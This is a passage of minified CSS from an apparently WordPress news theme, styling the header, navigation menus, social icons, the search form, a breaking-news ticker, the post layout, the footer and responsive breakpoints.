dotted}a:hover,a:active{outline:0;text-decoration:none}.col-1{width:100%}.col-3{width:33.33%}.col-4{width:25%}.col-66{width:66.67%}.float-l{float:left}.pad{padding-left:7.5px;padding-right:7.5px;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}.container-wrapper:before,.container-wrapper:after{content:"";display:table}.container-wrapper:after{clear:both}.container-wrapper{max-width:1500px;margin:0 auto;padding-left:25px;padding-right:25px;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}.pos-rel{position:relative}#secondary.sidebar-area{background-color:rgba(32,32,32,.05)}body.content-with-single-sidebar:not(.page-template-tmpl-front-page) .container-wrapper #primary{padding-left:0;padding-right:0}body.content-with-single-sidebar.align-content-left .container-wrapper #primary{float:left;width:72.33%;margin:0 1% 0 0;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}body.content-with-single-sidebar.align-content-left .container-wrapper #secondary{width:26.67%;float:left;padding:15px;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}.container-wrapper .content-area,.container-wrapper .sidebar-area{padding-left:15px;padding-right:15px;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}.af-flex-container{display:flex}.aft-small-social-menu{text-align:right}.aft-small-social-menu ul li{display:inline-block}.aft-small-social-menu ul li a{font-size:14px;font-family:FontAwesome;line-height:1;vertical-align:middle}.aft-small-social-menu ul li a:after{vertical-align:middle;vertical-align:middle;font-family:FontAwesome;font-size:14px;line-height:1}.aft-small-social-menu ul li a{display:block;width:30px;height:30px;font-size:18px;line-height:30px;position:relative;text-align:center}.aft-small-social-menu ul li a{color:#fff}.aft-small-social-menu ul a[href*="dribbble.com"]:after{content:""}.aft-small-social-menu ul a[href*="facebook.com"]:after{content:""}.aft-small-social-menu ul li a[href*="facebook.com"]{background-color:#3b5999}.aft-small-social-menu ul li a[href*="dribbble.com"]{background-color:#ea4c89}.aft-small-social-menu ul li a[href*="vk.com"]{background-color:#4c75a3}.aft-small-social-menu ul li a[href*="twitter.com"]{background-color:#55acee}.aft-small-social-menu ul li a[href*="linkedin.com"]{background-color:#0077b5}.aft-small-social-menu ul li a[href*="instagram.com"]{background-color:#3f729b}.aft-small-social-menu ul li a[href*="youtube.com"]{background-color:#cd201f}.aft-small-social-menu ul li a[href*="vimeo.com"]{background-color:#1ab7ea}.aft-small-social-menu ul li a[href*="plus.google.com"]{background-color:#dd4b39}.aft-small-social-menu ul li a[href*="pinterest.com"]{background-color:#bd081c}.aft-small-social-menu ul li a[href*="tumblr.com"]{background-color:#34465d}.aft-small-social-menu ul li a[href*="wordpress.org"]{background-color:#21759b}.aft-small-social-menu ul li a[href*="whatsapp.com"]{background-color:#25d366}.aft-small-social-menu ul li a[href*="reddit.com"]{background-color:#ff5700}.aft-small-social-menu ul li a[href*="t.me"]{background-color:#00405d}.aft-small-social-menu ul li a[href*="ok.ru"]{background-color:#ed812b}.aft-small-social-menu ul li a[href*="wechat.com"]{background-color:#09b83e}.aft-small-social-menu ul li a[href*="weibo.com"]{background-color:#ce1126}.aft-small-social-menu ul li a[href*="github.com"]{background-color:#00405d}.aft-small-social-menu ul li a{background:#fff}.aft-small-social-menu ul a[href*="vk.com"]:after{content:""}.aft-small-social-menu ul a[href*="twitter.com"]:after{content:""}.aft-small-social-menu ul a[href*="linkedin.com"]:after{content:""}.aft-small-social-menu ul a[href*="instagram.com"]:after{content:""}.aft-small-social-menu ul a[href*="youtube.com"]:after{content:""}.aft-small-social-menu ul a[href*="vimeo.com"]:after{content:""}.aft-small-social-menu ul a[href*="plus.google.com"]:after{content:""}.aft-small-social-menu ul a[href*="pinterest.com"]:after{content:""}.aft-small-social-menu ul a[href*="tumblr.com"]:after{content:""}.aft-small-social-menu ul a[href*="wordpress.org"]:after,.aft-small-social-menu ul a[href*="wordpress.com"]:after{content:""}.aft-small-social-menu ul a[href*="whatsapp.com"]:after{content:""}.aft-small-social-menu ul a[href*="reddit.com"]:after{content:""}.top-bar-flex{display:flex;align-items:center;position:relative;min-height:30px;-webkit-flex-wrap:wrap;-ms-flex-wrap:wrap;flex-wrap:wrap}.top-bar-left{display:flex;align-items:center}.date-bar-left{color:#fff;font-weight:600;min-width:125px}.main-navigation ul li:after{position:absolute;content:"";width:100%;height:3px;left:0;bottom:0;background-color:#fff}.main-navigation ul li:hover:after{-webkit-animation:af-menu-animation .5s ease-in-out;-moz-animation:af-menu-animation .5s ease-in-out;-o-animation:af-menu-animation .5s ease-in-out;animation:af-menu-animation .5s ease-in-out}@-webkit-keyframes af-menu-animation{0%{width:0}100%{width:100%}}@-moz-keyframes af-menu-animation{0%{width:0}100%{width:100%}}@-o-keyframes af-menu-animation{0%{width:0}100%{width:100%}}@keyframes af-menu-animation{0%{width:0}100%{width:100%}}.main-navigation ul li:nth-child(7n+1):after{background-color:#2196f3}.main-navigation ul li:nth-child(7n+2):after{background-color:#4caf50}.main-navigation ul li:nth-child(7n+3):after{background-color:#ffbf3f}.main-navigation ul li:nth-child(7n+4):after{background-color:#ff5722}.main-navigation ul li:nth-child(7n+5):after{background-color:#00bcd4}.main-navigation ul li:nth-child(7n+6):after{background-color:#9c27b0}.main-navigation ul li:nth-child(7n+7):after{background-color:#8bc34a}.main-navigation ul.sub-menu li:after{display:none}.main-navigation ul li{position:relative;display:inline-block;transition-duration:.5s;text-transform:uppercase;font-size:14px;line-height:20px;padding:15px 20px;font-family:"Barlow",sans-serif;font-weight:600}.main-navigation ul li a{color:#fff;font-family:"Roboto",sans-serif}.main-navigation ul li.menu-item-has-children > a:after{content:"";font-family:FontAwesome;padding:0 5px;color:inherit;font-size:inherit}.main-navigation ul .sub-menu li.menu-item-has-children > a:after{display:none}.main-navigation ul .sub-menu li.menu-item-has-children > a:before{content:"";font-family:FontAwesome;padding-right:10px;float:left}.main-navigation ul ul{float:left;position:absolute;top:100%;left:-999em;z-index:99999}.main-navigation .menu ul ul,.main-navigation ul .sub-menu{min-width:245px;margin-left:0;width:auto;background:#fff;-webkit-box-shadow:-1px 2px 5px 0 rgba(0,0,0,.15);-moz-box-shadow:-1px 2px 5px 0 rgba(0,0,0,.15);-ms-box-shadow:-1px 2px 5px 0 rgba(0,0,0,.15);-o-box-shadow:-1px 2px 5px 0 rgba(0,0,0,.15);box-shadow:-1px 2px 5px 0 rgba(0,0,0,.15)}.main-navigation ul li:focus-within > ul{left:auto}.main-navigation ul li:hover > ul,.main-navigation ul li:focus > ul{left:auto}.main-navigation ul ul li:focus-within > ul{left:calc(100% + 1px);top:0}.main-navigation ul ul li:hover > ul,.main-navigation ul ul li:focus > ul{left:calc(100% + 1px);top:0}.main-navigation ul .sub-menu li{display:block;float:none;text-align:left;padding:0;border-top:1px solid rgba(0,0,0,.1)}.main-navigation ul .sub-menu li:first-child{border:none}.main-navigation ul .sub-menu li a{padding:15px;display:inline-block;position:relative;color:#1c1c1c}.aft-home-icon{display:inline-block;padding:12px;float:left;background-color:#f25600;line-height:1;margin-right:4px;min-height:50px}.aft-home-icon a{color:#fff;font-size:24px}.ham{width:23px;height:2px;top:50%;display:block;margin-right:auto;background-color:#fff;position:relative;-webkit-transition:all .25s ease-in-out;-moz-transition:all .25s ease-in-out;-ms-transition:all .25s ease-in-out;-o-transition:all .25s ease-in-out;transition:all .25s ease-in-out}.ham:before,.ham:after{position:absolute;content:"";width:100%;height:2px;left:0;top:-8px;background-color:#fff;-webkit-transition:all .25s ease-in-out;-moz-transition:all .25s ease-in-out;-ms-transition:all .25s ease-in-out;-o-transition:all .25s ease-in-out;transition:all .25s ease-in-out}.ham:after{top:8px}@media screen and (max-width: 1024px){.toggle-menu{display:block;float:left}.main-navigation ul ul a:hover{background:transparent}.main-navigation ul>li>a:hover:after{background:transparent}}.main-navigation .toggle-menu a{height:50px;width:40px;text-align:center;cursor:pointer;font-size:14px;display:none;display:none;padding:0;padding-left:10px;vertical-align:middle}@media screen and (max-width: 1024px){.main-navigation .toggle-menu a{display:inline-block}}.top-header .date-bar-left span.topbar-date{display:inline-block;vertical-align:middle}.header-style1 .top-header{padding:5px 0;background:#1c1c1c}.header-style1 .top-header .af-secondary-menu a{color:#fff}.header-style1{background:#fff}.header-style1 .logo-brand{text-align:center}.header-style1 .logo-brand .site-description,.header-style1 .logo-brand .site-title{margin:0}.header-style1 .navigation-section-wrapper .container-wrapper{display:flex;align-items:center;justify-content:space-between;position:relative}.header-style1 .header-middle-part{display:inline-block;flex:auto}.header-style1 .header-right-part{display:flex;align-items:center;float:right}.header-style1 .header-right-part > div{margin:0 0 0 5px;text-align:center}.header-style1 .header-right-part > div.popular-tag-custom-link{display:flex;align-items:center}.header-style1 .header-right-part > div > a{color:#000;font-size:14px}.header-style1 .header-right-part .popular-tag-custom-link > div.custom-menu-link > a{display:flex;align-items:center}.header-style1 .header-right-part .popular-tag-custom-link > div.custom-menu-link a > i{background:#ff9800;height:33px;width:33px;line-height:33px;font-size:16px;color:#fff;display:inline-block}.header-style1 .header-right-part .popular-tag-custom-link > div.custom-menu-link a > span{background:#c30010;padding:5px 10px;color:#fff;font-weight:600;display:block;text-transform:uppercase;font-size:14px}.af-search-wrap{width:25px;position:relative;display:inline-block;text-align:center}.search-icon{display:block;line-height:38px;font-size:14px;color:#fff;font-weight:600;text-align:center;outline:0}.search-icon:visited,.search-icon:hover,.search-icon:focus,.search-icon:active{color:#fff;outline:0}.af-search-form{background:#fff;position:absolute;right:0;top:120%;width:325px;text-align:left;visibility:hidden;filter:alpha(opacity=0);opacity:0;margin:0 auto;margin-top:1px;padding:14px;z-index:99;border-radius:0px;-webkit-transition:opacity .2s,top .4s,visibility 0s linear .4s;-moz-transition:opacity .2s,top .4s,visibility 0s linear .4s;-ms-transition:opacity .2s,top .4s,visibility 0s linear .4s;-o-transition:opacity .2s,top .4s,visibility 0s linear .4s;transition:opacity .2s,top .4s,visibility 0s linear .4s;-webkit-box-shadow:0 4px 5px 0 rgba(0,0,0,.15);-moz-box-shadow:0 4px 5px 0 rgba(0,0,0,.15);-ms-box-shadow:0 4px 5px 0 rgba(0,0,0,.15);-o-box-shadow:0 4px 5px 0 rgba(0,0,0,.15);box-shadow:0 4px 5px 0 rgba(0,0,0,.15)}.search-overlay:focus-within .af-search-form{visibility:visible;filter:alpha(opacity=1);opacity:1;z-index:999;top:100%;-webkit-transition:opacity .4s,top .4s;-moz-transition:opacity .4s,top .4s;-ms-transition:opacity .4s,top .4s;-o-transition:opacity .4s,top .4s;transition:opacity .4s,top .4s}.search-form label{width:75%;float:left;margin-bottom:0}input.search-field{float:none;width:100%;padding:0 14px;height:38px;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;background:#fafafa;border:1px solid rgba(0,0,0,.1);font-size:13px;border-radius:3px 0px 0px 3px;font-weight:normal}input.search-submit{background:#404040;border:1px solid rgba(0,0,0,.1);border-radius:0px 3px 3px 0px;color:#fff;padding:0px;height:37px;font-size:13px;width:25%;margin:0}.header-style1 .main-header .af-flex-container{align-items:center;position:relative;padding-bottom:55px;padding-top:55px}.header-style1 .main-header .logo-brand{text-align:left}.header-menu-part{height:50px}.bottom-bar{width:100%;border-top:3px solid #f25600;z-index:100;position:relative;background:#c00;background-image:-moz-linear-gradient(140deg,#c00,#f25600);background-image:-o-linear-gradient(140deg,#c00,#f25600);background-image:-webkit-linear-gradient(140deg,#c00,#f25600);background-image:linear-gradient(140deg,#c00,#f25600);-webkit-transition:height 0s,-webkit-transform .3s;transition:height 0s,-webkit-transform .3s;transition:transform .3s,height 0s;transition:transform .3s,height 0s,-webkit-transform .3s;-webkit-transform:translate3d(0,0,0);transform:translate3d(0,0,0);-webkit-transform-style:preserve-3d;transform-style:preserve-3d;-webkit-backface-visibility:hidden;backface-visibility:hidden}.screen-reader-text{display:none}.screen-reader-text:focus{background-color:#f1f1f1;border-radius:3px;box-shadow:0 0 2px 2px rgba(0,0,0,.6);clip-path:none;color:#21759b;display:block;font-size:14px;font-size:.875rem;font-weight:bold;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}.screen-reader-text:focus:not(#_#_#_#_#_#_#_){clip:auto}.af-main-banner-latest-posts{margin:0px 0 20px}.widget-title,.header-after1{position:relative;margin:15px 0 25px 0;font-size:20px}.widget-title span,.header-after1 span{display:inline-block;position:relative;z-index:1;padding:5px 5px 15px 0;text-transform:uppercase}.newsever-widget:not(.aft-widget-background-default) .widget-title span:after,.newsever-widget:not(.aft-widget-background-default) .header-after1 span:after{display:none}.top-header .screen-reader-text,.search-form .screen-reader-text{display:none}.newsever-widget.widget_search form{margin-top:15px}.newsever-widget.widget_search .widget-title + form{margin-top:0}.entry-content > [class*="wp-block-"] a:hover,.entry-content > ul a,.entry-content > ul a:hover,.entry-content > p a,.entry-content > p a:hover{text-decoration:underline}.banner-exclusive-posts-wrapper{background:#202020;background-image:-moz-linear-gradient(45deg,#404040,#202020);background-image:-o-linear-gradient(45deg,#404040,#202020);background-image:-webkit-linear-gradient(45deg,#404040,#202020);background-image:linear-gradient(45deg,#404040,#202020)}.exclusive-posts{font-size:16px;line-height:45px;margin:0;position:relative;display:flex;align-items:center}.exclusive-posts .exclusive-now{float:left;text-transform:uppercase;position:relative;line-height:normal;margin-right:5px}.exclusive-now-txt-animation-wrap{background:#c30010;overflow:hidden;position:relative}.exclusive-posts .exclusive-now > span{display:inline-block;font-weight:bold;color:#fff;background-color:#ff9800;height:20px;width:70px;font-size:11px;line-height:20px;text-align:center;position:relative;position:absolute;transform:translate(90%,-50%);z-index:1;top:0;left:0}.exclusive-posts .exclusive-now > span:before{content:"";position:absolute;display:block;width:0px;height:0px;top:0;left:-9px;border-left:9px solid transparent;border-right:0px solid transparent;border-top:20px solid #ff9800}.exclusive-posts .exclusive-now > span:after{content:"";position:absolute;display:block;width:0px;height:0px;right:-9px;top:0;border-right:9px solid transparent;border-left:0px solid transparent;border-bottom:20px solid #ff9800}.exclusive-now-txt-animation-wrap span.fancy-spinner{position:absolute;top:0;left:0;transform:translateX(-50%)}.exclusive-posts .exclusive-now span.exclusive-texts-wrapper{display:inline-block;padding:15px 30px;background:#af0000;color:#fff;width:max-content}.exclusive-posts .exclusive-now span.exclusive-texts-wrapper > span{display:inline-block}.exclusive-posts .exclusive-texts-wrapper span{line-height:normal}.exclusive-posts .exclusive-now span.exclusive-news-subtitle{font-size:14px;font-weight:bold}.exclusive-posts .exclusive-now span.exclusive-news-subtitle.af-exclusive-animation span{display:inline-block;-webkit-animation-name:heartBeat;animation-name:heartBeat;-webkit-animation-duration:1.4s;animation-duration:1.4s;-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out;animation-iteration-count:infinite}@-webkit-keyframes heartBeat{0%{-webkit-transform:scale(1);transform:scale(1)}14%{-webkit-transform:scale(1.1);transform:scale(1.1)}28%{-webkit-transform:scale(1);transform:scale(1)}42%{-webkit-transform:scale(1.1);transform:scale(1.1)}70%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes heartBeat{0%{-webkit-transform:scale(1);transform:scale(1)}14%{-webkit-transform:scale(1.1);transform:scale(1.1)}28%{-webkit-transform:scale(1);transform:scale(1)}42%{-webkit-transform:scale(1.1);transform:scale(1.1)}70%{-webkit-transform:scale(1);transform:scale(1)}}.fancy-spinner{display:flex;justify-content:center;align-items:center;margin-right:5px;width:60px;height:50px;min-width:50px;min-height:50px}.fancy-spinner div{position:absolute;width:50px;height:50px;border-radius:50%}.fancy-spinner div.ring{border-width:5px;border-style:solid;border-color:transparent;-webkit-animation:2s fancy infinite alternate;animation:2s fancy infinite alternate}.fancy-spinner div.ring:nth-child(1){border-left-color:#ff9800;border-right-color:#fff}.fancy-spinner div.ring:nth-child(2){border-top-color:#a2020f;border-bottom-color:#a2020f;-webkit-animation-delay:2s;animation-delay:2s}.fancy-spinner div.dot{width:16px;height:16px;background:#a2020f}@-webkit-keyframes fancy{to{-webkit-transform:rotate(360deg) scale(.6);transform:rotate(360deg) scale(.6)}}@keyframes fancy{to{-webkit-transform:rotate(360deg) scale(.6);transform:rotate(360deg) scale(.6)}}.exclusive-slides{padding:0 5px;overflow:hidden}.exclusive-slides .marquee{width:10000px}.exclusive-slides .marquee{display:flex;align-items:center}.aft-flash-slide > div{display:flex;align-items:center}.exclusive-posts .marquee a{padding:0 15px;display:flex;align-items:center;font-size:14px;line-height:normal;color:#fff;font-weight:600;flex-shrink:0}.exclusive-posts .marquee a span.circle-marq{width:40px;min-width:40px;height:40px;min-height:40px;overflow:hidden;display:inline-block;line-height:1;margin-right:15px;position:relative}.exclusive-posts .marquee a amp-img{height:40px;width:40px;object-fit:cover}.read-single{margin-bottom:15px}.read-img amp-img{width:100%}.read-img.read-bg-img{background-size:cover;background-position:center;background-repeat:no-repeat;height:225px;background-color:#404040}.read-img.read-bg-img amp-img{width:100%;height:100%;margin:0;object-fit:cover}.read-img.read-bg-img a:not(.newsever-categories):not(.af-comment-count){display:block;height:100%;width:100%;font-size:0;position:absolute;z-index:1;top:0;left:0}.min-read{color:#202020;padding:3px 10px;font-size:12px;font-weight:600;line-height:17px;border-radius:50px;background-color:rgba(255,255,255,.7);display:inline-block;font-family:"Barlow",sans-serif}.read-img .min-read-post-format{position:absolute;left:15px;top:15px;display:inline-block;z-index:1}.read-img .min-read-post-format span.read-categories{display:block}.min-read-item{display:inline-block;vertical-align:middle}.cat-links{font-size:0}.cat-links li{display:inline-block;font-size:10px;margin-right:10px;line-height:normal;text-transform:uppercase;opacity:.75;font-weight:600}.cat-links li:hover{opacity:1}.aft-default-mode .cat-links li a{color:#2b2b2b;display:block}.read-title h4{font-size:22px;margin:5px 0;font-weight:normal;line-height:1.33}.read-title h4 a{color:#1c1c1c;font-weight:600;opacity:.95;outline:none}.read-title h4 a:hover{opacity:1}.read-title h4 a:hover,.read-title h4 a:focus,.read-title h4 a:active{color:#000}.read-details .entry-meta span{font-size:12px;color:#1c1c1c}.read-details .entry-meta span i{font-size:12px}.read-details .entry-meta span > span{margin-right:8px}.read-details .entry-meta span > span:last-child{margin-right:0}.grid-layout .read-img.read-bg-img .read-categories{position:absolute;top:0;left:0;margin:0;z-index:1;padding:15px;width:100%}.grid-layout .read-img.read-bg-img .read-categories .cat-links{margin:0;float:left;width:calc(100% - 50px)}.grid-layout .read-img.read-bg-img .read-categories .cat-links li{margin-top:2px}.read-details .entry-meta span,.read-details .entry-meta span a{color:#404040}.af-container-block-wrapper{background:#fff;padding:20px;margin-top:20px}@media screen and (max-width: 992px){.af-container-block-wrapper .breadcrumbs{padding:20px}}.af-container-block-wrapper.clearfix{padding-top:20px;padding-bottom:20px}.pad-20.af-container-block-wrapper{padding:10px 20px}.read-details .entry-meta{line-height:1}ul.trail-items li{display:inline-block;margin-right:5px}ul.trail-items li a{opacity:.7}ul.trail-items li a:hover{opacity:1;transition:all 1200ms cubic-bezier(.215,.61,.355,1)}ul.trail-items li:after{content:" / ";padding:0 2px;color:#393e46;font-size:13px}ul.trail-items li:last-child:after{display:none}.entry-header .entry-title{margin:10px 0}body.single-post:not(.aft-single-full-header) .entry-header-details{margin:0 15px;padding:0 15px}body.single-post .entry-title{font-size:60px;padding:0}body.single-post:not(.aft-single-full-header) .entry-content-wrap .min-read-post-format{left:50%;transform:translateX(-50%);width:fit-content}.container-wrapper .read-details.af-container-block-wrapper{display:flex;-webkit-align-items:center;align-items:center;-webkit-flex-wrap:wrap;-ms-flex-wrap:wrap;flex-wrap:wrap}@media screen and (max-width: 990px){.container-wrapper .read-details.af-container-block-wrapper .newsever-entry-header-details-wrap{width:100%}body.single-post:not(.aft-single-full-header) .entry-header-details{margin:15px;padding:15px}}.post-meta-share-wrapper{display:flex;-webkit-align-items:center;align-items:center;-webkit-flex-wrap:wrap;-ms-flex-wrap:wrap;flex-wrap:wrap;padding:10px 0}.single-post .post-meta-share-wrapper .post-meta-detail{font-size:12px;font-weight:600}.single-post .post-meta-share-wrapper .post-meta-detail .min-read{color:#4a4a4a;padding:0;background-color:unset}.post-meta-share-wrapper .post-meta-detail{display:inline-block}body.single-post .entry-content-wrap.read-single .post-meta-detail .entry-meta span i,body.single-post .entry-content-wrap.read-single .post-meta-detail .entry-meta span{font-size:14px}body.single-post .entry-content-wrap.read-single .post-meta-detail .min-read{background-color:transparent;color:#4a4a4a;padding:0}body.single-post .post-meta-detail > span:not(.min-read-post-format):after{content:"∙";color:inherit;font-weight:bold;padding:0 5px 0 5px}body.single-post .post-meta-detail > span:last-child:after{display:none}.entry-content > [class*="wp-block-"] a:not(.has-text-color),.entry-content > ul a,.entry-content > ul a:visited,.entry-content > p a,.entry-content > p a:visited{color:#f25600}.entry-content > [class*="wp-block-"] a:hover,.entry-content > ul a,.entry-content > ul a:hover,.entry-content > p a,.entry-content > p a:hover{text-decoration:underline}body .entry-content,body.single-post .entry-content.read-details{max-width:750px;margin:0 auto}body:not(.full-width-content) #primary .entry-header,body:not(.full-width-content) .entry-content,body.single-post:not(.full-width-content) .entry-content.read-details{max-width:none;margin:0;padding:0 6.67em}body.single-post span.min-read-post-format{display:inline-block}.sidebar-area .widget{margin-bottom:30px}.site-footer .af-sec-post,.sidebar-area .af-sec-post{width:100%}.widget > ul li{margin-bottom:5px;padding-bottom:5px;font-size:14px;color:#888}.widget .cat-links{padding:0;margin:0}.widget .cat-links li{margin-top:2px;padding-bottom:0}.widget > ul ul{padding-top:5px;margin-top:5px;margin-left:10px;padding-left:10px}.widget > ul > li:last-child{margin-bottom:0;padding-bottom:0;border-bottom:none}.sidebar-area .widget > ul > li a{font-size:16px;color:#404040}.sidebar-area .widget > ul > li a:hover{color:#1c1c1c}.sidebar-area .widget,footer .widget{margin-bottom:30px;padding:0}.sidebar-area .widget:last-child{margin-bottom:0}.nav-links a{color:#000;font-weight:500;transition:all 300ms ease;display:block}.nav-links .nav-next a:after{transition:all 300ms ease}.post-navigation{overflow:visible;padding:10px 0}span.em-post-navigation{display:block}.nav-links .nav-previous a:before,.nav-links .nav-next a:after{padding:0 5px;font-family:FontAwesome}.navigation.post-navigation:after{content:"";display:table}.navigation.post-navigation:after{clear:both}.post-navigation .nav-previous{float:left;width:50%}.post-navigation .nav-next{float:right;text-align:right;width:50%}button,input[type="button"],input[type="reset"],input[type="submit"]{border:none;border-radius:0;background:#f25600;color:#fff;font-size:14px;line-height:normal;height:38px;padding:5px 12px;transition:all 300ms ease-out}article.latest-posts-grid{margin-bottom:20px}article.latest-posts-grid .read-single{margin-bottom:0}#scroll-up{position:fixed;z-index:8000;bottom:40px;right:20px;display:none;width:50px;height:50px;font-size:28px;line-height:50px;text-align:center;text-decoration:none;cursor:pointer;color:#fff;background-color:#f25600}#scroll-up:not(#_#_#_#_#_#_#_){opacity:1}#scroll-up i{display:inline-block}amp-img.wp-post-image{display:block;margin:1em auto}#content + footer.site-footer{margin-top:20px}footer.site-footer{background-color:#1c1c1c}.site-footer a{color:#fff}.site-info{text-align:center;padding:10px 0}.site-info a{color:#fff}.entry-content ul:not([class*="wp-"]):not(.awpa-contact-info){padding-left:0;margin-left:15px;margin-bottom:15px}.entry-content ul:not([class*="wp-"]){list-style-type:disc}.entry-content ul:not([class*="wp-"]) li{padding-bottom:5px;padding-top:5px}.entry-content ul:not([class*="wp-"]) ul{margin-bottom:0}.entry-content ul:not([class*="wp-"]) ul li:last-child{padding-bottom:0}.entry-content ul:not([class*="wp-"]){margin-bottom:15px}.site-footer .color-pad,.site-footer .widget-title span,.site-footer .header-after1 span,.site-footer .color-pad .entry-meta span a,.site-footer .color-pad .entry-meta span,.site-footer .color-pad .read-title h4 a{color:#fff}body #scroll-up,body .aft-home-icon a{color:#fff}.color-pad .read-details.color-tp-pad{padding:15px}.color-pad .read-details.pad.color-tp-pad{padding-top:0;padding-bottom:0}.color-tp-pad.no-color-pad{padding:10px 0}body.aft-default-mode .site-footer .widget-area.color-pad .read-single.color-pad,body.aft-default-mode .sidebar-area .widget-area.color-pad .read-single.color-pad{background-color:transparent}.widget-area.color-pad .read-details.color-tp-pad{padding-bottom:0px;padding-left:0px;padding-right:0px}.site-footer .widget-area.color-pad .read-details.pad.color-tp-pad,.sidebar-area .widget-area.color-pad .read-details.pad.color-tp-pad{padding-left:10px;padding-right:10px}.color-pad .read-details.color-tp-pad{padding:15px}.grid-layout .color-pad .read-details.color-tp-pad{padding:15px 0}.color-tp-pad.no-color-pad{padding:10px 0}body button,body input[type="button"],body input[type="reset"],body input[type="submit"]{background:#f25600}body.aft-default-mode .site-footer .widget-area.color-pad .read-single.color-pad,body.aft-default-mode .sidebar-area .widget-area.color-pad .read-single.color-pad{background-color:transparent}.widget-area.color-pad .read-details.color-tp-pad{padding-left:0px;padding-right:0px}.site-footer .widget-area.color-pad .read-details.pad.color-tp-pad,.sidebar-area .widget-area.color-pad .read-details.pad.color-tp-pad{padding-left:10px;padding-right:10px}a.newsever-categories{display:inline-block;border-bottom:2px solid;padding:4px 0}footer.site-footer .cat-links li a{color:#fff}a.newsever-categories.category-color-1{border-color:#f25600}@media screen and (max-width: 1200px){body:not(.full-width-content) #primary .entry-header,body:not(.full-width-content) .entry-content,body.single-post:not(.full-width-content) .entry-content.read-details{padding:0}}@media screen and (max-width: 1025px){.read-details.af-container-block-wrapper.clearfix,.read-details.af-container-block-wrapper{padding:0}.af-container-block-wrapper.clearfix{padding-top:0;padding-bottom:0;background:unset}body.aft-default-mode .af-container-block-wrapper.clearfix #primary{background:#fff}}@media screen and (max-width: 1024px){body.content-with-single-sidebar.align-content-left .container-wrapper #primary,body.content-with-single-sidebar.align-content-left .container-wrapper #secondary{width:100%;margin:0}}@media screen and (max-width: 990px){.main-navigation ul .sub-menu li a{padding:0 15px}body.content-with-single-sidebar.align-content-left .container-wrapper #primary,body.content-with-single-sidebar.align-content-left .container-wrapper #secondary,.container-wrapper .sidebar-area,.container-wrapper #primary{width:100%;margin:0}.main-navigation ul li.menu-item-has-children > a:after{display:none}.header-style1 .header-middle-part{display:block;position:relative}.header-style1 .header-right-part{position:absolute;right:25px;top:6px}.af-main-banner-latest-posts.grid-layout .col-4{width:33.33%}}@media screen and (max-width: 768px){.container-wrapper{padding-left:15px;padding-right:15px}.header-style1 .main-header .af-flex-container{flex-wrap:wrap}.header-style1 .main-header .af-flex-container .col-3,.header-style1 .main-header .af-flex-container .col-66{width:100%}.header-style1 .main-header .af-flex-container > div:nth-child(2){padding-top:10px}.header-style1 .main-header .logo-brand{text-align:center}.af-main-banner-latest-posts.grid-layout .col-4{width:50%}}.aft-small-social-menu ul li a{line-height:29px}@media screen and (max-width: 700px){.af-secondary-menu .container-wrapper{padding:0}.top-bar-left.col-66{width:100%;-webkit-justify-content:space-between;justify-content:space-between}.top-bar-right.col-3{width:100%;margin:15px 0}.top-bar-right.col-3 ul{text-align:center}}@media screen and (max-width: 480px){body:not(.full-width-content) #primary .entry-header,body:not(.full-width-content) .entry-content,body.single-post:not(.full-width-content) .entry-content.read-details{padding:0}.af-sec-post,.col-3,.col-4{width:100%}.exclusive-now-txt-animation-wrap span.fancy-spinner{position:relative;transform:translateX(0);top:inherit;left:inherit}.exclusive-posts .exclusive-now > span,.exclusive-posts .exclusive-now span.exclusive-texts-wrapper,.exclusive-posts .exclusive-now span.exclusive-texts-wrapper > span{display:none}.exclusive-posts .marquee a{width:auto;max-width:none}.top-bar-flex{flex-wrap:wrap}.top-bar-left{-webkit-justify-content:space-between;justify-content:space-between;width:100%;-webkit-flex-wrap:wrap;-ms-flex-wrap:wrap;flex-wrap:wrap}.top-bar-left .af-secondary-menu{width:100%;text-align:center}footer .aft-small-social-menu{text-align:center}.af-main-banner-latest-posts.grid-layout .col-4{width:100%}#secondary .color-pad .read-details.pad.color-tp-pad{padding-top:0}.af-main-banner-latest-posts.grid-layout .col-4{width:100%}.af-search-wrap{position:static}}@media screen and (max-width: 320px){.af-search-form{width:290px}}.widget-title{position:relative}.widget-title::before{content:"";position:absolute;left:0;bottom:0;width:100%;height:3px;background-color:rgba(0,0,0,.1)}.widget-title .header-after::before{content:"";position:absolute;left:0;bottom:0;width:100%;height:3px;background-color:#f25600}.widget-title .category-color-1.header-after::before{background-color:#f25600}.af-container-row{margin-right:-7.5px;margin-left:-7.5px}@media screen and (max-width: 1024px){body.content-with-single-sidebar .container-wrapper #primary{margin-bottom:20px}}@media screen and (max-width: 480px){#secondary .read-title h4{font-size:16px}.header-style1 .header-right-part .popular-tag-custom-link > div.custom-menu-link a > span{display:none}}.single-post .post-meta-share-wrapper .item-metadata.posts-date,.single-post .post-meta-share-wrapper .post-meta-detail .min-read,.read-details .entry-meta{opacity:.75}#secondary .entry-meta{display:none}@media screen and (max-width: 1024px){body.single-post .entry-title{font-size:50px}}@media screen and (max-width: 992px){body.single-post .container-wrapper .content-area{padding:0}}@media screen and (max-width: 768px){body.single-post .entry-title{font-size:36px}body.single-post:not(.aft-single-full-header) .entry-header-details{margin:0;padding:15px}.header-style1 .header-right-part{right:15px}}.af-container-block-wrapper{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}@media screen and (max-width: 350px){.read-img.read-bg-img{height:180px}}#main-navigation-bar .af-search-wrap .search-icon:active,#main-navigation-bar .af-search-wrap .search-icon:focus{outline:1px dotted #fff}.site-title,.site-description{position:absolute;clip:rect(1px,1px,1px,1px);display:none}#amp-mobile-version-switcher{left:0;position:absolute;width:100%;z-index:100}#amp-mobile-version-switcher>a{background-color:#444;border:0;color:#eaeaea;display:block;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;font-weight:600;padding:15px 